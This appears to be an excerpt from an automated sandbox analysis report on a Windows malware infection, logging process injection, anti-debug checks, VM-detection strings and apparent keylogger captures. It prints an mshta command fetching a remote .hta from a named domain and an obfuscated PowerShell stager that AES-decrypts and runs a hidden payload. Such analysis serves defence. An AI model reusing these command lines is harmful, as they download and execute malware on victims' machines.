                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97945
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97825
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97718
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97609
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97499
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97390
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97281
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97169
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97062
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 96953
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 96843
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 96734
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 96624
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 96515
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1200000
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199809
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199687
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199305
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199172
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197547
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197435
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197328
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197219
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197109
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197000
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1196880
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1196766
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1196652
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1196544
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1196403
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1196229
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1196124
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1196012
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1195854
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1195728
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1195608
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1195470
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1195295
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1195143
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1194979
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1194835
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1194719
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 922337203685477
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 100000
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99879
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99765
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99655
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99546
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99435
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99325
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99209
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99078
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98936
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98822
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98718
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98606
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98484
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98374
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98264
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98156
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98046
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97936
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97797
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97685
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97564
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97424
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97292
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97180
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1200000
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199865
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199744
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199618
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199448
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199323
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199199
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199043
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198916
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198764
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198627
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198467
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198331
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 922337203685477
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 100000
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99875
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99751
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99609
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99500
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99388
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99265
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99146
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99019
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98890
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98781
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98672
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98562
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98453
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98342
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98218
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98109
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97979
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97859
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97750
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97631
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97515
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97390
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97278
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1200000
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199829
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199704
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199590
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199469
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199359
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199250
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199110
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199000
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198888
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198781
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198657
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198532
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198422
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198297
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198185
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198078
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197954
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197836
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197730
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197586
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197471
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197344
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197235
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197094
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1196985
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1196875
                    Source: bwsiuvcU.pif, 00000019.00000002.1793876103.0000000029440000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1711636457.000000002944F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
                    Source: mshta.exe, 00000009.00000002.1863621793.0000019AC1767000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1858256707.0000019AC1766000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1856924692.0000019AC1757000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1757000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1863133474.0000019AC16A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1863133474.0000019AC1716000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2529557915.0000021C3382B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2531528743.0000021C38E58000.00000004.00000020.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1496845420.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1496845420.00000000007AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                    Source: powershell.exe, 00000011.00000002.1635136687.0000029E32767000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}n
                    Source: Ucvuiswb.PIF, 00000018.00000002.1625890136.00000000005FA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllvvX
                    Source: powershell.exe, 00000011.00000002.1635136687.0000029E3275E000.00000004.00000020.00020000.00000000.sdmp, Ucvuiswb.PIF, 0000001A.00000002.1711968278.00000000005DB000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556758276.00000000411C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: bwsiuvcU.pif, 00000017.00000002.1683295114.0000000041300000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllaa
                    Source: C:\Users\user\AppData\Roaming\uc.exe API call chain: ExitProcess graph end node graph_19-38404
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif API call chain: ExitProcess graph end node graph_23-59625
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIF API call chain: ExitProcess graph end node graph_24-27484
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif API call chain: ExitProcess graph end node
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 23_2_0040CE09
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear, 23_2_004019F0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,23_2_004019F0
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_02997AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,19_2_02997AC0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_0040ADB0 GetProcessHeap,HeapFree,23_2_0040ADB0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_0040CE09
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_0040E61C
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_00416F6A
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_004123F1 SetUnhandledExceptionFilter,23_2_004123F1
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_1_0040CE09
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_1_0040E61C
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_1_00416F6A
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_1_004123F1 SetUnhandledExceptionFilter,23_1_004123F1
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,25_2_0040CE09
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,25_2_0040E61C
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_00416F6A
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_004123F1 SetUnhandledExceptionFilter,25_2_004123F1
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Roaming\uc.exe | Memory allocated: C:\Users\Public\Libraries\bwsiuvcU.pif base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\uc.exe | Memory allocated: C:\Users\Public\Libraries\bwsiuvcU.pif base: 1E090000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF | Memory allocated: C:\Users\Public\Libraries\bwsiuvcU.pif base: 400000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF | Memory allocated: C:\Users\Public\Libraries\bwsiuvcU.pif base: 121D0000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF | Memory allocated: C:\Users\Public\Libraries\bwsiuvcU.pif base: 1E090000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\uc.exe | Section unmapped: C:\Users\Public\Libraries\bwsiuvcU.pif base address: 400000
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF | Section unmapped: C:\Users\Public\Libraries\bwsiuvcU.pif base address: 400000
Source: C:\Users\user\AppData\Roaming\uc.exe | Memory written: C:\Users\Public\Libraries\bwsiuvcU.pif base: 2A5008
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF | Memory written: C:\Users\Public\Libraries\bwsiuvcU.pif base: 211008
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF | Memory written: C:\Users\Public\Libraries\bwsiuvcU.pif base: 239008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/yt.hta
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = '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';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\uc.exe "C:\Users\user\AppData\Roaming\uc.exe"
Source: C:\Users\user\AppData\Roaming\uc.exe | Process created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF | Process created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $osfnkdw = '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';$jifvezk = 'cfrkugzlwwl4r2zhdlp1wlrocflzr3rfvutmamhetuc=';$ugiwrbah = new-object 'system.security.cryptography.aesmanaged';$ugiwrbah.mode = [system.security.cryptography.ciphermode]::ecb;$ugiwrbah.padding = [system.security.cryptography.paddingmode]::zeros;$ugiwrbah.blocksize = 128;$ugiwrbah.keysize = 256;$ugiwrbah.key = [system.convert]::frombase64string($jifvezk);$vpsle = [system.convert]::frombase64string($osfnkdw);$ubmsttpl = $vpsle[0..15];$ugiwrbah.iv = $ubmsttpl;$clyzavcnc = $ugiwrbah.createdecryptor();$evtppvfwq = $clyzavcnc.transformfinalblock($vpsle, 16, $vpsle.length - 16);$ugiwrbah.dispose();$darjcu = new-object system.io.memorystream( , $evtppvfwq );$wdjfzjy = new-object system.io.memorystream;$mtmsbjehy = new-object system.io.compression.gzipstream $darjcu, ([io.compression.compressionmode]::decompress);$mtmsbjehy.copyto( $wdjfzjy );$mtmsbjehy.close();$darjcu.close();[byte[]] $dvtmfgse = $wdjfzjy.toarray();$ghwdgw = [system.text.encoding]::utf8.getstring($dvtmfgse);$ghwdgw | powershell -
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE6A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program ManagerLR
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE6A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE6A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q8<b>[ Program Manager]</b> (24/04/2024 13:36:37)<br>{Win}TH
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE6A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q9<b>[ Program Manager]</b> (24/04/2024 13:36:37)<br>{Win}rTH
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE6A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Managert-
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE6A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q3<b>[ Program Manager]</b> (24/04/2024 13:36:37)<br>
Source: C:\Users\user\AppData\Roaming\uc.exe | Code function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,19_2_0299D5D0
Source: C:\Users\user\AppData\Roaming\uc.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,19_2_02985A90
Source: C:\Users\user\AppData\Roaming\uc.exe | Code function: GetLocaleInfoA,19_2_0298A780
Source: C:\Users\user\AppData\Roaming\uc.exe | Code function: GetLocaleInfoA,19_2_0298A7CC
Source: C:\Users\user\AppData\Roaming\uc.exe | Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,19_2_02985B9C
Source: C:\Users\user\AppData\Roaming\uc.exe | Code function: GetCurrentProcess,EnumSystemLocalesA,ExitProcess,19_2_029A5FA0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: GetLocaleInfoA,23_2_00417A20
Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: GetLocaleInfoA,23_1_00417A20
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF | Code function: WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,24_2_028BD5D0
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,24_2_028A5A90
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF | Code function: GetLocaleInfoA,24_2_028AA7CC
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF | Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,24_2_028A5B9B
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF | Code function: GetCurrentProcess,EnumSystemLocalesA,ExitProcess,24_2_028C5F9F
Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: GetLocaleInfoA,25_2_00417A20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
